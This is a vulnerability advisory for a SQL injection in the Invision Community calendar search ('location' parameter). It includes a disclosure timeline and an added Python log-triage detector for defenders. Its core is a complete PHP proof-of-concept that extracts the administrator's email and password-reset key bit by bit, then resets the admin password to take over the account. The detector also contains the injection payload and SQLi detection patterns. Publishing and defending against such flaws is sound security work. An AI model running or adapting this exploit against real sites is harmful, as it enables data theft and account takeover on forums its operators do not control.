----------------------------------------------------------------------------
Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
----------------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

Certain 4.x versions before 4.7.21.

[-] Vulnerability Description:

The vulnerability is located within the /applications/calendar/modules/front/calendar/view.php script. Specifically, in the IPS\calendar\modules\front\calendar\view::search() method, user input passed through the "location" request parameter is not properly sanitized before being used to construct a SQL query. This can be exploited by remote, unauthenticated attackers to, for example, read sensitive data from the database through boolean-based SQL Injection attacks. Successful exploitation of this vulnerability requires the "calendar" application to be installed and a "GeoLocation feature" (like Google Maps) to be configured.

NOTE: SQL Injection vulnerabilities in Invision Community 4.x might lead to admin account takeover and RCE attacks by resetting the admin's password. However, starting from version 4.7.18, a new security encryption key has been introduced within the password reset mechanism. As such, this attack vector no longer works with versions >= 4.7.18.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2025-48932.php

[-] Solution:

Upgrade to version 4.7.21 or later.

[-] Disclosure Timeline:

[16/05/2025] - Vendor notified
[27/05/2025] - Version 4.7.21 released
[28/05/2025] - CVE identifier requested
[28/05/2025] - CVE identifier assigned
[23/07/2025] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-48932 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.
[-] Original Advisory:

http://karmainsecurity.com/KIS-2025-06

--- CVE-2025-48932.php poc ---

<?php
// NOTE: the banner/usage message at the top of the script is truncated in this
// copy of the advisory (only its closing `\n\n");` survived). The script takes
// the target's base URL (trailing slash included) as its single argument.

$url = $argv[1];
$ch = curl_init();
@unlink("./cookies.txt");
curl_setopt($ch, CURLOPT_URL, "{$url}");
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");

// The front page embeds the CSRF key the calendar search form expects.
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf))
    die("[-] CSRF token not found!\n");

$params = ["app" => "calendar", "module" => "calendar", "controller" => "view",
           "do" => "search", "form_submitted" => 1, "csrfKey" => $csrf[1]];

// Boolean-based extraction: each byte of the query result is recovered by a
// binary search (one request per bit, eight per byte). The injected RLIKE
// pattern is either valid ('1') or invalid ('('); the invalid one makes the
// page render an "elErrorMessage" element, which acts as the true/false oracle.
function sql_injection($sql)
{
    global $ch, $params;
    $data = ""; // accumulated result (left uninitialised in the original)
    $min  = true;
    $idx  = 1;
    while (1)
    {
        $test = 256;
        for ($i = 7; $i >= 0; $i--)
        {
            $test = $min ? $test - pow(2, $i) : $test + pow(2, $i);
            $params["location"] = "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},0x28,0x31)))#";
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
            $min = preg_match("/elErrorMessage/", curl_exec($ch));
        }
        // A NUL byte marks the end of the string.
        if (($chr = $min ? $test - 1 : $test) == 0) break;
        $data .= chr($chr);
        $min = true;
        $idx++;
        print "\r[*] Data: {$data}";
    }
    return $data;
}

print "[+] Step 1: fetching admin's e-mail address\n";
$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";
fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";
$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");
$passwd = md5(time());
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
if (!preg_match("/301 Moved Permanently/i", curl_exec($ch)))
    die("[-] Attack failed!\n");

print "[+] Pwned! You can now login with {$email}:{$passwd}\n";
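The advisory pins the vulnerable surface down precisely (calendar app, view controller, "search" action, "location" parameter), which is enough to write a log triage check for it. The script below is an added example for defenders; it is not part of the advisory or of Invision Community's code. It assumes a constructed log line format of the form `<ip> "<METHOD> <path>" <status> body=<urlencoded POST body or ->`, merges query-string and POST-body parameters (the PoC on this page uses POST, but the search action is treated here as reachable either way), and flags a source as a likely extraction attempt once it has sent at least eight suspicious calendar searches, because the boolean-based technique shown above needs one request per bit, i.e. eight requests per recovered byte. The sample log lines are constructed inline; the injection string in them is the one the page's PoC uses.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlencode, urlsplit

# Request signature taken from the advisory: calendar app, view controller, "search" action.
TARGET_PARAMS = {"app": "calendar", "module": "calendar", "controller": "view", "do": "search"}

# Token patterns typical of SQL injection probes against a free-text field such as "location".
SQLI_PATTERNS = {
    "quote_paren_or": re.compile(r"['\"]\)+\s*or\s*\(", re.I),   # e.g. '))OR(
    "subquery": re.compile(r"\bselect\b", re.I),
    "char_probe": re.compile(r"\b(rlike|regexp|substr|substring|ord|ascii|if|sleep|benchmark)\s*\(", re.I),
    "comment_tail": re.compile(r"(#|--|/\*)\s*$"),               # trailing SQL comment
}

# Constructed log format (an assumption of this example, not a real server's format).
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) body=(?P<body>\S*)$')

# The PoC above sends 8 requests per extracted byte; a source at or above this count
# of suspicious calendar searches is worth treating as an extraction attempt.
EXTRACTION_THRESHOLD = 8


def request_params(path, body):
    """Merge query-string and POST-body parameters (first value wins per key)."""
    merged = {}
    for raw in (urlsplit(path).query, "" if body == "-" else body):
        for key, values in parse_qs(raw, keep_blank_values=True).items():
            merged.setdefault(key, values[0])
    return merged


def sqli_indicators(value):
    """Return the names of the injection patterns that match a parameter value."""
    return [name for name, pattern in SQLI_PATTERNS.items() if pattern.search(value)]


def triage(log_lines):
    """Return per-request findings and a per-IP count of suspicious calendar searches."""
    findings = []
    per_ip = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not in the assumed format; skip
        params = request_params(m["path"], m["body"])
        if not all(params.get(k) == v for k, v in TARGET_PARAMS.items()):
            continue                       # not the calendar search action
        hits = sqli_indicators(params.get("location", ""))
        if hits:
            findings.append({"ip": m["ip"], "indicators": hits, "location": params["location"]})
            per_ip[m["ip"]] += 1
    return findings, per_ip


def extraction_sources(per_ip, threshold=EXTRACTION_THRESHOLD):
    """IPs whose suspicious-request count reaches the threshold, sorted."""
    return sorted(ip for ip, count in per_ip.items() if count >= threshold)


def build_sample_log():
    """Constructed sample: one benign search, eight probes from one source, one unrelated request."""
    base = dict(TARGET_PARAMS, form_submitted="1", csrfKey="0000csrfkeyplaceholder0000")
    benign = dict(base, location="Berlin, Germany")
    probe = dict(base, location="'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM "
                                "core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#")
    lines = [f'198.51.100.7 "POST /index.php" 200 body={urlencode(benign)}']
    lines += [f'203.0.113.9 "POST /index.php" 200 body={urlencode(probe)}' for _ in range(8)]
    lines.append('203.0.113.9 "GET /index.php?app=forums" 200 body=-')
    return lines


if __name__ == "__main__":
    findings, per_ip = triage(build_sample_log())
    for f in findings:
        print(f'{f["ip"]}: {", ".join(f["indicators"])} -> {f["location"][:40]}...')
    print("likely extraction sources:", extraction_sources(per_ip))
```

Tuning note: the `char_probe` list is deliberately broad (it includes `IF(` and `SLEEP(`), so on a real deployment it should be scored together with the other indicators and the per-source burst count rather than alerting on a single match; a lone `(` in a place name is not interesting, eight `RLIKE(` probes from one address within a few seconds are.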